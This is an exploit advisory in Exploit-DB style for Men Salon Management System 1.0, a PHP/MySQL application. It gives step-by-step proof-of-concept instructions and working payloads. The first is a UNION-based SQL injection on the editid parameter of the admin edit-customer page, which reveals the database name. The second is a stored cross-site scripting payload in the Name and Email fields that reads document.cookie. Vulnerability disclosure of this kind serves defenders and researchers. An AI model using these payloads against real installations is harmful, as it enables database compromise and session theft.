# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
# Date: 2021-09-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server

# Vulnerable page :
http://localhost/msms/admin/edit-customer-detailed.php?editid=

# Proof Of Concept :
# 1 . Download And install [ Men Salon Management System ]
# 2 . Go to /msms/admin/index.php and Enter Username & Password
# 3 . Navigate to >> Customer List 
# 4 . In the action column, click Edit 
# 5 . Enter the payload into the Url and Fields

# [ Sql Injection ] :

Vulnerable paramater :
The editid paramater is Vulnerable to sqli

GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+

# [ Stored Cross-Site Scripting ] : 

Vulnerable Fields : Name & Email

Payload Used: "><script>alert(document.cookie)</script>